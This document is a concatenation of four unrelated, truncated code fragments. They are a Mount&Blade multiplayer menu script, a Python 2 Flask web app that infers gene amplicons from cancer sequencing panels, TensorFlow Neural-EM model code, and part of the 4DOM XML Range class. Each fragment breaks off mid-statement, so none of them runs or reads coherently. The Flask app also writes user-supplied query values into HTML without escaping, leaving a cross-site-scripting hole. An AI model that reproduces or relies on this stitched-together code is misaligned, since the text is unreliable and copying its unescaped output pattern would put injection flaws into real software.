(start_presentation, "prsnt_coop_team_select"),
(else_try),
(store_mission_timer_a, ":mission_timer"),
(gt, ":mission_timer", 1),
(this_or_next|key_clicked, key_escape),
(this_or_next|key_clicked, key_space),
(this_or_next|key_clicked, key_enter),
(this_or_next|key_clicked, key_left_mouse_button),
(key_clicked, key_right_mouse_button),
(assign, "$g_multiplayer_welcome_message_shown", 1),
(presentation_set_duration, 0),
(neg|is_presentation_active, "prsnt_coop_escape_menu"),
(neg|is_presentation_active, "prsnt_coop_team_select"),
(try_begin),
(eq, "$g_multiplayer_show_server_rules", 1),
(assign, "$g_multiplayer_show_server_rules", 0),
(start_presentation, "prsnt_coop_escape_menu"),
(else_try),
(start_presentation, "prsnt_coop_team_select"),
(try_end),
(try_end),
]),
]),
("coop_escape_menu", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(assign, "$g_presentation_obj_escape_menu_1", -1),
(assign, "$g_presentation_obj_escape_menu_2", -1),
(assign, "$g_presentation_obj_escape_menu_3", -1),
(assign, "$g_presentation_obj_escape_menu_4", -1),
(assign, "$g_presentation_obj_escape_menu_5", -1),
(assign, "$g_presentation_obj_escape_menu_6", -1),
(assign, "$g_presentation_obj_escape_menu_7", -1),
(assign, "$g_presentation_obj_escape_menu_8", -1),
(assign, "$g_presentation_obj_escape_menu_9", -1),
(assign, "$g_presentation_obj_escape_menu_10", -1),
(assign, "$g_presentation_obj_escape_menu_11", -1),
(assign, "$g_presentation_obj_escape_menu_12", -1),
(assign, "$g_presentation_obj_escape_menu_13", | |
from flask import Flask, request
app = Flask(__name__)
@app.route("/evaluate")
def infercnv():
assay = request.args.get('test')
assay = assay.encode('ascii','ignore')
if assay == "FoundationOne":
filename2 = "foundationone.txt"
if assay == "FoundationCdx":
filename2 = "foundation_one_cdx.txt"
if assay == "TempusXT":
filename2 = "tempus-596.txt"
if assay == "Oncomine-v3":
filename2 = "oncomine-v3.txt"
if assay == "Caris-MI":
filename2 = "caris-mi-profile.txt"
if assay == "Trusight170":
filename2 = "trusight_170.txt"
if assay == "Trusight500":
filename2 = "trusight500.txt"
if assay == "STRATA-NGS":
filename2 = "strataNGS.txt"
if assay == "custom":
customlist = request.args.get('custom')
customlist = customlist.encode('ascii', 'ignore')
verboseoutput = ""
verboseoutput = request.args.get('verbose')
#verboseoutput = verboseoutput.encode('ascii', 'ignore')
filename1 = "coordinates.txt"
filename3 = "cosmic.txt"
foundationlist = []
genelist = []
genome = []
counter = 0
cosmiclist = []
if assay != "custom":
with open(filename2) as fh: # imports the list of genes on Foundation One test
while True:
line2 = fh.readline().rstrip() # read the first line
line2 = line2.upper()
if not line2: break
foundationlist.append(line2)
if assay == "custom":
foundationlist = customlist.split("\r\n")
foundationlist = map(str.strip, foundationlist) # removes spaces from elements in list
foundationlist = map(str.upper, foundationlist) # convert all elements of string to upper case
foundationlist = filter(None, foundationlist) # removes blank elements in list resulting from blank lines in form text area
with open(filename3) as fh: # imports the list of genes recurrently altered in cancer from COSMIC
while True:
line3 = fh.readline().rstrip() # read the first line
line3 = line3.upper()
if not line3: break
cosmiclist.append(line3)
with open(filename1) as fh:
while True:
line1 = fh.readline().rstrip() # read the first line
line1 = line1.upper() # changes all text to upper case
counter += 1
if not line1: break
if "Chromosome" not in line1:
chr, start, end, karyotype, gene = line1.split("\t") # splits each line by tabs
genelist.append(gene)
coordinates = chr, start, end, karyotype, gene
coordinates = list(coordinates)
coordinateswithcounter = chr, start, end, karyotype, gene, counter
coordinateswithcounter = list(coordinateswithcounter)
genome.append(coordinateswithcounter)
weboutput = "" #starts assembling a string which will return the results to browser in html format
weboutput += "<h1>InferAMP Results:</h1>"
#weboutput += customlist
candidates = []
query = request.args.get('query') # takes the query argument passed in http query to app (gene names)
query = query.encode('ascii','ignore') # change imported text from unicode to ascii
candidates = list(query.split(","))
candidates = map(str.strip, candidates) # removes spaces from elements in list
candidates = map(str.upper, candidates) # convert all elements of string to upper case
weboutput += str("Assay selected: " + assay + " (" + str(len(foundationlist)) + " genes).<br>")
if len(foundationlist) < 100:
weboutput += "Note: Amplicon boundary refinement is much more accurate in assays panels with high gene numbers."
if verboseoutput == "verbose":
weboutput += "<p> Verbose output selected.<br>"
weboutput += "<p> Assay gene list:<br>"
for s in foundationlist:
weboutput += str(s + "," + " ")
weboutput += "<p>----------------------------------------------------------------------------------------------------------------------------</p>"
if assay == "custom":
custom_errors=[]
for s in foundationlist:
if s not in genelist:
custom_errors.append(s)
if custom_errors != []:
weboutput += "<p> Custom assay gene name entry error check:<br>"
weboutput += str("I didn't find the following gene(s). Are you sure of correct name: " + str(custom_errors) + "<br>")
weboutput += "If it is one of the following, please correct to the standard name:<br>"
weboutput += "C10ORF54 = VSIR <br> C11ORF30 = EMSY <br> C17ORF39 = GID4<br> FAM123B = AMER1<br> FAM175A = ABRAXAS1<br> GPR124 = ADGRA2<br> MLL = KMT2A<br> MLL2 = KMT2D <br> MLL3 = KMT2C<br> MRE11A = MRE11 <br> MYCL1 = MYCL <br> MYST3 = KAT6A <br> PAK5 = PAK7<br> PARK2 = PRKN <br> TCEB1 = ELOC<br> WHSC1 = NSD1<br> WHSC1L1 = NSD3<br>"
weboutput += "Otherwise, please try to find an alternate name <a href=\"https://www.ncbi.nlm.nih.gov/gene\"> HERE</a> <br>"
for a in candidates:
if a not in genelist: # handling cases where entered gene name is not in list - either typo or using non-standard name
weboutput += "*****************************************************************<br>"
weboutput += str("I didn't find the following gene. Are you sure of correct name: " + a + "<br>")
weboutput += "*****************************************************************<br>"
weboutput += "If it is one of the following, please correct to the standard name:<br>"
weboutput += "C10ORF54 = VSIR <br> C11ORF30 = EMSY <br> C17ORF39 = GID4<br> FAM123B = AMER1<br> FAM175A = ABRAXAS1<br> GPR124 = ADGRA2<br> MLL = KMT2A<br> MLL2 = KMT2D <br> MLL3 = KMT2C<br> MRE11A = MRE11 <br> MYCL1 = MYCL <br> MYST3 = KAT6A <br> PAK5 = PAK7<br> PARK2 = PRKN <br> TCEB1 = ELOC<br> WHSC1 = NSD1<br> WHSC1L1 = NSD3<br>"
weboutput += "*****************************************************************<br>"
weboutput += str("<p> You entered the following amplified genes: " + "%s" % ", ".join(map(str, candidates)) + "<br>")
nonamplifiedgenes = list(set(foundationlist) - set(candidates)) # assumes genes not flagged as amplified by Foundation are not amplified. Told this is true by Tech Support
for g in genome: # tag genes with status for FoundationOne reported genes
if g[4] in candidates:
g.append("reported-up")
elif g[4] in nonamplifiedgenes:
g.append("reported-notup")
elif g not in candidates and g not in nonamplifiedgenes:
g.append("not reported")
currentstatus = "Pending"
lastchr = "0"
firsthit = 0
laststatus = ""
lasthit = 0
increment_startpending = 1
for g in genome: # populates g[6] with "Pending"
g.append("unassigned")
for g in genome:
currentchr = g[0]
currentposition = int(g[5])
if g[6] == "reported-up" and firsthit == 0:
currentstatus = "inferAMP"
g[7] = currentstatus
firsthit = 1 # flags the first gene on the chr with a Foundation One report. 1 is for amplified, 2 is for same
increment_firstfound = int(g[5])
increment_lastfound = int(g[5])
lasthit = 1
if g[6] == "reported-notup" and firsthit == 0:
currentstatus = "inferSAME"
g[7] = currentstatus
firsthit = 2 # flags the first gene on the chr with a Foundation One report. 1 is for amplified, 2 is for same
increment_firstfound = int(g[5])
increment_lastfound = int(g[5])
lasthit = 2
if g[
6] == "reported-up" and firsthit > 0: # found amplified gene in an amplicon already containing an amplified gene
currentstatus = "inferAMP"
g[7] = currentstatus
if lasthit == 2:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleAMP"
if lasthit == 1:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "inferAMP"
increment_lastfound = int(g[5])
lasthit = 1
if g[6] == "reported-notup" and firsthit > 0:
currentstatus = "inferSAME"
g[7] = currentstatus
increment_lastfound = int(g[5])
lasthit = 2
if g[6] == "not reported" and currentchr == lastchr:
if laststatus == "inferAMP":
g[7] = "possibleAMP"
elif laststatus != "inferAMP":
g[7] = laststatus
if currentchr != lastchr: # need to close out variables and fill in information between chr ends and first Foundation One assessment
currentposition = int(g[5])
if firsthit == 1: # fills in fields from start of chr to first reported marker
for a in genome[increment_startpending - 1:increment_firstfound - 1]:
a[7] = "possibleAMP"
if firsthit == 2:
for a in genome[increment_startpending - 1:increment_firstfound - 1]:
a[7] = "possibleSAME"
if lasthit == 1:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleAMP"
if lasthit == 2:
for a in genome[increment_lastfound:currentposition - 1]:
a[7] = "possibleSAME"
lasthit = 0
firsthit = 0
increment_startpending = int(g[5])
lastchr = currentchr
laststatus = currentstatus
for q in genome: # converts chromosomal p q arms to lower case
q[3] = str(q[3]).lower()
regions = []
amplicon = []
foundamplicon = 0
for q in genome:
if "AMP" in q[7]:
foundamplicon = 1
amplicon.append(q)
if "AMP" not in q[7] and foundamplicon == 1:
foundamplicon = 0
regions.append(amplicon)
amplicon = []
print "%s amplicons found. " % len(regions)
boundary_gene_list = []
for a in regions:
weboutput += "<p>----------------------------------------------------------------------------------------------------------------------------</p>"
cosmicinamp = []
genesinamp = []
startgene = a[0] # picks the start and end chromosomal ideogram loci for reporting
endgene = a[len(a) - 1]
startlocus = startgene[0] + startgene[3]
endlocus = endgene[0] + endgene[3]
start_non_amp_index = startgene[5]-1 #gets the index of the gene preceding the first predicted amplified gene
end_non_amp_index = endgene[5]+1 #gets the index of the gene following the last predicted amplified gene
for w in a:
genesinamp.append(w[4])
for v in genome: | |
(B, K, H, W, C)
"""
with tf.name_scope('mask_rnn_inputs'):
if not gradient_gamma:
gamma = tf.stop_gradient(gamma)
return rnn_inputs * gamma # implicitly broadcasts over C
def run_inner_rnn(self, masked_deltas, h_old):
with tf.name_scope('reshape_masked_deltas'):
shape = tf.shape(masked_deltas)
batch_size = shape[0]
K = shape[1]
M = np.prod(self._input_shape.as_list())
reshaped_masked_deltas = tf.reshape(masked_deltas, tf.stack([batch_size * K, M]))
preds, h_new = self.cell(reshaped_masked_deltas, h_old)
return tf.reshape(preds, shape=shape), h_new
def compute_em_probabilities(self, predictions, data, epsilon=1e-6):
"""Compute pixelwise probability of predictions (wrt. the data).
:param predictions: (B, K, H, W, C)
:param data: (B, 1, H, W, C)
:return: local loss (B, K, H, W, 1)
"""
with tf.name_scope('em_loss_{}'.format(self.distribution)):
if self.distribution == 'bernoulli':
p = predictions
probs = data * p + (1 - data) * (1 - p)
elif self.distribution == 'gaussian':
mu, sigma = predictions, self.e_sigma
probs = ((1 / tf.sqrt((2 * np.pi * sigma ** 2))) * tf.exp(-(data - mu) ** 2 / (2 * sigma ** 2)))
else:
raise ValueError(
'Unknown distribution_type: "{}"'.format(self.distribution))
# sum loss over channels
probs = tf.reduce_sum(probs, 4, keepdims=True, name='reduce_channels')
if epsilon > 0:
# add epsilon to probs in order to prevent 0 gamma
probs += epsilon
return probs
def e_step(self, preds, targets):
with tf.name_scope('e_step'):
probs = self.compute_em_probabilities(preds, targets)
# compute the new gamma (E-step)
gamma = probs / tf.reduce_sum(probs, 1, keepdims=True)
return gamma
def __call__(self, inputs, state, scope=None):
# unpack
input_data, target_data = inputs
h_old, preds_old, gamma_old = state
# compute difference between prediction and input
deltas = self.delta_predictions(preds_old, input_data)
# mask with gamma
masked_deltas = self.mask_rnn_inputs(deltas, gamma_old, self.gradient_gamma)
# compute new predictions
preds, h_new = self.run_inner_rnn(masked_deltas, h_old)
# compute the new gammas
gamma = self.e_step(preds, target_data)
# pack and return
outputs = (h_new, preds, gamma)
return outputs, outputs
def compute_prior(distribution, pixel_prior):
""" Compute the prior over the input data.
:return: prior (1, 1, 1, 1, 1)
"""
if distribution == 'bernoulli':
return tf.constant(pixel_prior['p'], shape=(1, 1, 1, 1, 1), name='prior')
elif distribution == 'gaussian':
return tf.constant(pixel_prior['mu'], shape=(1, 1, 1, 1, 1), name='prior')
else:
raise KeyError('Unknown distribution: "{}"'.format(distribution))
# log bci
def binomial_cross_entropy_loss(y, t):
with tf.name_scope('binomial_ce'):
clipped_y = tf.clip_by_value(y, 1e-6, 1. - 1.e-6)
return -(t * tf.log(clipped_y) + (1. - t) * tf.log(1. - clipped_y))
# log gaussian
def gaussian_squared_error_loss(mu, sigma, x):
return (((mu - x)**2) / (2 * tf.clip_by_value(sigma ** 2, 1e-6, 1e6))) + tf.log(tf.clip_by_value(sigma, 1e-6, 1e6))
# compute KL(p1, p2)
def kl_loss_bernoulli(p1, p2):
with tf.name_scope('KL_loss'):
return (
p1 * tf.log(tf.clip_by_value(p1 / tf.clip_by_value(p2, 1e-6, 1e6), 1e-6, 1e6)) +
(1 - p1) * tf.log(tf.clip_by_value((1-p1)/tf.clip_by_value(1-p2, 1e-6, 1e6), 1e-6, 1e6))
)
# compute KL(p1, p2)
def kl_loss_gaussian(mu1, mu2, sigma1, sigma2):
return (
tf.log(tf.clip_by_value(sigma2/sigma1, 1e-6, 1e6)) +
(sigma1 ** 2 + (mu1 - mu2) ** 2) / (2 * sigma2 ** 2) - 0.5
)
def compute_outer_loss(mu, gamma, target, prior, pixel_distribution, inter_weight, gradient_gamma):
with tf.name_scope('outer_loss'):
if pixel_distribution == 'bernoulli':
intra_loss = binomial_cross_entropy_loss(mu, target)
inter_loss = kl_loss_bernoulli(prior, mu)
elif pixel_distribution == 'gaussian':
intra_loss = gaussian_squared_error_loss(mu, 1.0, target)
inter_loss = kl_loss_gaussian(mu, prior, 1.0, 1.0)
else:
raise KeyError('Unknown pixel_distribution: "{}"'.format(pixel_distribution))
# weigh losses by gamma and reduce by taking mean across B and sum across H, W, C, K
# implemented as sum over all then divide by B
batch_size = tf.to_float(tf.shape(target)[0])
if gradient_gamma:
intra_loss = tf.reduce_sum(intra_loss * gamma) / batch_size
inter_loss = tf.reduce_sum(inter_loss * (1. - gamma)) / batch_size
else:
intra_loss = tf.reduce_sum(intra_loss * tf.stop_gradient(gamma)) / batch_size
inter_loss = tf.reduce_sum(inter_loss * (1. - tf.stop_gradient(gamma))) / batch_size
total_loss = intra_loss + inter_weight * inter_loss
return total_loss, intra_loss, inter_loss
def compute_loss_upper_bound(pred, target, pixel_distribution):
max_pred = tf.reduce_max(pred, axis=1, keepdims=True)
if pixel_distribution == 'bernoulli':
loss = binomial_cross_entropy_loss(max_pred, target)
elif pixel_distribution == 'gaussian':
loss = gaussian_squared_error_loss(max_pred, 1.0, target)
else:
raise KeyError('Unknown pixel_distribution: "{}"'.format(pixel_distribution))
# reduce losses by taking mean across B and sum across H, W, C, K
# implemented as sum over all then divide by B
batch_size = tf.to_float(tf.shape(target)[0])
loss_upper_bound = tf.reduce_sum(loss) / batch_size
return loss_upper_bound
def get_loss_step_weights(n_steps, loss_step_weights):
if loss_step_weights == 'all':
return [1.0] * n_steps
elif loss_step_weights == 'last':
loss_iter_weights = [0.0] * n_steps
loss_iter_weights[-1] = 1.0
return loss_iter_weights
elif isinstance(loss_step_weights, (list, tuple)):
assert len(loss_step_weights) == n_steps, len(loss_step_weights)
return loss_step_weights
else:
raise KeyError('Unknown loss_iter_weight type: "{}"'.format(loss_step_weights))
class NEM_Network(ScopedFunction):
binary = Param()
k = Param()
n_steps = Param()
inter_weight = Param()
gradient_gamma = Param()
e_sigma = Param()
pred_init = Param()
loss_step_weights = Param()
noise_prob = Param()
pixel_prior = Param()
use_NEM_formulation = Param()
def __init__(self, env, scope=None, **kwargs):
self.obs_shape = env.obs_shape
self.image_height, self.image_width, self.image_depth = self.obs_shape
# ap_iou_values = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
# self.eval_funcs = {"AP_at_point_{}".format(int(10 * v)): AP(v) for v in ap_iou_values}
# self.eval_funcs["AP"] = AP(ap_iou_values)
self.eval_funcs = dict()
self.input_network = None
self.cell = None
self.output_network = None
super(NEM_Network, self).__init__(scope=scope)
@property
def inp(self):
return self._tensors["inp"]
@property
def batch_size(self):
return self._tensors["batch_size"]
@property
def is_training(self):
return self._tensors["is_training"]
@property
def float_is_training(self):
return self._tensors["float_is_training"]
@property
def float_do_explore(self):
return self._tensors["float_do_explore"]
def _call(self, inp, _, is_training):
inp, labels, background = inp
return self.build_graph(inp, labels, background, is_training)
def build_graph(self, inp, labels, background, is_training):
self._tensors = dict(
inp=inp,
annotations=labels[0],
n_annotations=labels[1],
is_training=is_training,
float_is_training=tf.to_float(is_training),
background=background,
batch_size=tf.shape(inp)[0]
)
self.tiled_inp = tf.tile(
inp[None, :, None, ...],
[self.n_steps+1, 1, 1, 1, 1, 1], name="inp")
noise_type = 'bitflip' if self.binary else 'masked_uniform'
inp_corrupted = add_noise(self.tiled_inp, self.noise_prob, noise_type)
# Get dimensions
input_shape = tf.shape(self.tiled_inp)
assert input_shape.get_shape()[0].value == 6, (
"Requires 6D input (T, B, K, H, W, C) but {}".format(input_shape.get_shape()[0].value))
# T = time, B = batch size, K = number of components, the rest are image size...
H, W, C = (x.value for x in self.tiled_inp.get_shape()[-3:])
pixel_dist = 'bernoulli' if self.binary else 'gaussian'
# inner_cell = build_network(
# H * W * C,
# output_dist=pixel_dist,
# input=self.input_network,
# recurrent=self.recurrent_network,
# output=self.output_network,
# use_NEM_formulation=self.use_NEM_formulation)
if self.input_network is None:
self.input_network = cfg.build_input_network(scope="input_network")
if self.cell is None:
self.cell = cfg.build_cell(scope="cell")
if self.output_network is None:
self.output_network = cfg.build_output_network(scope="output_network")
inner_cell = FullCell(self.input_network, self.cell, self.output_network, self.is_training)
nem_cell = NEMCell(
inner_cell, input_shape=(H, W, C), distribution=pixel_dist,
pred_init=self.pred_init, e_sigma=self.e_sigma,
gradient_gamma=self.gradient_gamma)
prior = compute_prior(pixel_dist, self.pixel_prior)
hidden_state = nem_cell.init_state(input_shape[1], self.k, dtype=tf.float32)
outputs = [hidden_state]
total_losses, upper_bound_losses, intra_losses, inter_losses = [], [], [], []
loss_step_weights = get_loss_step_weights(self.n_steps, self.loss_step_weights)
for t, loss_weight in enumerate(loss_step_weights):
inputs = (inp_corrupted[t], self.tiled_inp[t+1])
hidden_state, output = nem_cell(inputs, hidden_state)
theta, pred, gamma = output
total_loss, intra_loss, inter_loss = compute_outer_loss(
pred, gamma, self.tiled_inp[t+1], prior, pixel_distribution=pixel_dist,
inter_weight=self.inter_weight, gradient_gamma=self.gradient_gamma)
# compute estimated loss upper bound (which doesn't use E-step)
loss_upper_bound = compute_loss_upper_bound(pred, self.tiled_inp[t+1], pixel_dist)
total_losses.append(loss_weight * total_loss)
upper_bound_losses.append(loss_upper_bound)
intra_losses.append(intra_loss)
inter_losses.append(inter_loss)
outputs.append(output)
thetas, preds, gammas = zip(*outputs)
self._tensors["thetas"] = tf.stack(thetas) # (T, 1, B*K, M)
self._tensors["preds"] = tf.stack(preds) # (T, B, K, H, W, C)
self._tensors["gammas"] = tf.stack(gammas) # (T, B, K, H, W, C)
self._tensors["output"] = self._tensors["preds"][-1, :, 0]
intra_losses = tf.stack(intra_losses) # (T,)
inter_losses = tf.stack(inter_losses) # (T,)
upper_bound_losses = tf.stack(upper_bound_losses) # (T,)
regularization_loss = tf.stack(total_losses)
flat_inp = tf.layers.flatten(self._tensors["inp"])
reconstruction = tf.layers.flatten(self._tensors["output"])
reconstruction_loss = -tf.reduce_sum(
flat_inp * tf.log(reconstruction + 1e-9) +
(1.0 - flat_inp) * tf.log(1.0 - reconstruction + 1e-9),
axis=1, name="reconstruction_loss"
)
losses = dict(
regularization=tf.reduce_mean(regularization_loss),
reconstruction=tf.reduce_mean(reconstruction_loss)
)
self.recorded_tensors = {
"upper_bound_loss_last": tf.reduce_sum(upper_bound_losses[-1]),
"intra_loss_last": tf.reduce_sum(intra_losses[-1]),
"inter_loss_last": tf.reduce_sum(inter_losses[-1]),
}
return {
"tensors": self._tensors,
"recorded_tensors": self.recorded_tensors,
"losses": losses,
}
class NeuralEM_RenderHook(object):
def __init__(self, N=16):
self.N = N
def __call__(self, updater):
fetched = self._fetch(self.N, updater)
self._plot(updater, fetched)
def _fetch(self, N, updater):
feed_dict = updater.data_manager.do_val()
network = updater.network
to_fetch = dict(
gammas=network._tensors["gammas"][:, :self.N],
preds=network._tensors["preds"][:, :self.N],
images=network._tensors["inp"][:self.N]
)
sess = tf.get_default_session()
fetched = sess.run(to_fetch, feed_dict=feed_dict)
return fetched
def _plot(self, updater, fetched):
images = fetched['images']
preds = fetched['preds']
gammas = fetched['gammas']
hard_gammas = np.argmax(gammas, axis=2)
N = images.shape[0]
network = updater.network
_, image_height, image_width, _ = images.shape
for i in range(N):
fig, axes = plt.subplots(2*network.k + 2, network.n_steps+1, figsize=(20, 20))
for t in range(network.n_steps+1):
ax = axes[0, t]
img = images[i]
ax.imshow(img)
if t == 0:
ax.set_title("ground truth")
ax.set_xlabel("t = {}".format(t))
ax = axes[1, t]
img = preds[t, i, 0]
ax.imshow(img)
if t == 0:
ax.set_title("reconstruction")
ax.set_xlabel("t = {}".format(t))
for k in range(network.k):
ax = axes[k+2, t]
img = gammas[t, i, k, :, :, 0]
ax.imshow(img)
if t == 0:
ax.set_title("component {} - soft".format(k))
ax.set_xlabel("t = {}".format(t))
for k in | |
########################################################################
#
# File Name: Range.py
#
# Documentation: http://docs.4suite.com/4DOM/Range.py.html
#
"""
WWW: http://4suite.com/4DOM e-mail: <EMAIL>
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom import InvalidStateErr
from xml.dom import InvalidNodeTypeErr
from xml.dom import BadBoundaryPointsErr
from xml.dom import IndexSizeErr
from xml.dom import WrongDocumentErr
from xml.dom import Node
class Range:
readOnly =['startContainer',
'startOffset',
'endContainer',
'endOffset',
'collapsed',
'commonAncestorContainer',
]
POSITION_EQUAL = 1
POSITION_LESS_THAN = 2
POSITION_GREATER_THAN = 3
START_TO_START = 0
START_TO_END = 1
END_TO_END = 2
END_TO_START = 3
def __init__(self,ownerDocument):
self._ownerDocument = ownerDocument
self.__dict__['startContainer'] = ownerDocument
self.__dict__['startOffset'] = 0
self.__dict__['endContainer'] = ownerDocument
self.__dict__['endOffset'] = 0
self.__dict__['collapsed'] = 1
self.__dict__['commonAncestorContainer'] = ownerDocument
self.__dict__['detached'] = 0
def __setattr__(self,name,value):
if name in self.readOnly:
raise AttributeError, name
self.__dict__[name] = value
def __getattr__(self,name):
if name in self.readOnly:
#Means we are detached
raise InvalidStateErr()
raise AttributeError, name
def cloneContents(self):
"""Clone the contents defined by this range"""
if self.detached:
raise InvalidStateErr()
df = self._ownerDocument.createDocumentFragment()
if self.startContainer == self.endContainer:
if self.startOffset == self.endOffset:
return df
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
data = self.startContainer.substringData(self.startOffset,1+self.endOffset-self.startOffset)
tx = self._ownerDocument.createTextNode(data)
df.appendChild(tx)
else:
#Clone a set number of children
numDel = self.endOffset - self.startOffset+1
for ctr in range(numDel):
c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
df.appendChild(c)
elif self.startContainer == self.commonAncestorContainer:
#Clone up the endContainer
#From the start to the end
lastKids = []
copyData = None
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
copyData = self.endContainer.substringData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
lastKids.append(self.endContainer.childNodes[ctr].cloneNode(1))
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
#Clone all of the way up
newCur = cur.cloneNode(0)
if copyData:
newCur.data = copyData
copyData = None
for k in lastKids:
newCur.appendChild(k)
lastKids = []
index = cur.parentNode.childNodes.index(cur)
for ctr in range(index):
lastKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
lastKids.append(newCur)
cur = cur.parentNode
newEnd = cur.cloneNode(0)
for k in lastKids:
newEnd.appendChild(k)
endAncestorChild = cur
#Extract up to the ancestor of end
for c in self.startContainer.childNodes:
if c == endAncestorChild:
break
df.appendChild(c.cloneNode(1))
df.appendChild(newEnd)
elif self.endContainer == self.commonAncestorContainer:
lastKids = []
copyData = None
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
copyData = self.startContainer.substringData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
lastKids.append(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
#Clone all of the way up
newCur = cur.cloneNode(0)
if copyData:
newCur.data = copyData
copyData = None
for k in lastKids:
newCur.appendChild(k)
lastKids = [newCur]
index = cur.parentNode.childNodes.index(cur)
for ctr in range(index+1,len(cur.parentNode.childNodes)):
lastKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
cur = cur.parentNode
startAncestorChild = cur
newStart = cur.cloneNode(0)
for k in lastKids:
newStart.appendChild(k)
df.appendChild(newStart)
#Extract up to the ancestor of start
startAncestorChild = cur
startIndex = self.endContainer.childNodes.index(cur)
lastAdded = None
for ctr in range(startIndex+1,self.endOffset+1):
c = self.endContainer.childNodes[ctr].cloneNode(1)
df.insertBefore(c,lastAdded)
lastAdded = c
else:
#From the start to the end
lastStartKids = []
startCopyData = None
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
startCopyData = self.startContainer.substringData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
lastStartKids.append(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
#Clone all of the way up
newCur = cur.cloneNode(0)
if startCopyData:
newCur.data = startCopyData
startCopyData = None
for k in lastStartKids:
newCur.appendChild(k)
lastStartKids = [newCur]
index = cur.parentNode.childNodes.index(cur)
for ctr in range(index+1,len(cur.parentNode.childNodes)):
lastStartKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
cur = cur.parentNode
startAncestorChild = cur
newStart = cur.cloneNode(0)
for k in lastStartKids:
newStart.appendChild(k)
df.appendChild(newStart)
lastEndKids = []
endCopyData = None
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
endCopyData = self.endContainer.substringData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
c = self.endContainer.childNodes[ctr].cloneNode(1)
lastEndKids.append(c)
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
newCur = cur.cloneNode(0)
if endCopyData:
newCur.data = endCopyData
endCopyData = None
for k in lastEndKids:
newCur.appendChild(k)
lastEndKids = []
index = cur.parentNode.childNodes.index(cur)
for ctr in range(index):
lastEndKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
lastEndKids.append(newCur)
cur = cur.parentNode
endAncestorChild = cur
newEnd = cur.cloneNode(0)
for k in lastEndKids:
newEnd.appendChild(k)
cur = startAncestorChild
#Extract everything between us
startIndex = startAncestorChild.parentNode.childNodes.index(startAncestorChild)
endIndex = endAncestorChild.parentNode.childNodes.index(endAncestorChild)
for ctr in range(startIndex+1,endIndex):
c = startAncestorChild.parentNode.childNodes[ctr]
df.appendChild(c.cloneNode(1))
df.appendChild(newEnd)
#Adjust the containers
#FIXME What the heck is the spec talking about??
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.startContainer
self.__dict__['commonAncestorContainer'] = self.startContainer
self.__dict__['collapsed'] = 1
return df
def cloneRange(self):
if self.detached:
raise InvalidStateErr()
newRange = Range(self._ownerDocument)
newRange.setStart(self.startContainer,self.startOffset)
newRange.setEnd(self.endContainer,self.endOffset)
return newRange
def collapse(self,toStart):
"""Collapse the range"""
if self.detached:
raise InvalidStateErr()
if toStart:
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.startOffset
else:
self.__dict__['startContainer'] = self.endContainer
self.__dict__['startOffset'] = self.endOffset
self.__dict__['collapsed'] = 1
self.__dict__['commonAncestorContainer'] = self.startContainer
def compareBoundaryPoints(self,how,sourceRange):
if self.detached:
raise InvalidStateErr()
if not hasattr(sourceRange,'_ownerDocument') or sourceRange._ownerDocument != self._ownerDocument or not isinstance(sourceRange,Range):
raise WrongDocumentErr()
if how == self.START_TO_START:
ac = self.startContainer
ao = self.startOffset
bc = sourceRange.startContainer
bo = sourceRange.startOffset
elif how == self.START_TO_END:
ac = self.startContainer
ao = self.startOffset
bc = sourceRange.endContainer
bo = sourceRange.endOffset
elif how == self.END_TO_END:
ac = self.endContainer
ao = self.endOffset
bc = sourceRange.endContainer
bo = sourceRange.endOffset
elif how == self.END_TO_START:
ac = self.endContainer
ao = self.endOffset
bc = sourceRange.startContainer
bo = sourceRange.startOffset
else:
raise TypeError, how
pos = self.__comparePositions(ac,ao,bc,bo)
if pos == self.POSITION_EQUAL:
return 0
elif pos == self.POSITION_LESS_THAN:
return -1
return 1
def deleteContents(self):
"""Delete the contents defined by this range"""
#NOTE Use 4DOM ReleaseNode cause it is interface safe
from xml.dom.ext import ReleaseNode
if self.detached:
raise InvalidStateErr()
if self.startContainer == self.endContainer:
if self.startOffset == self.endOffset:
return
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
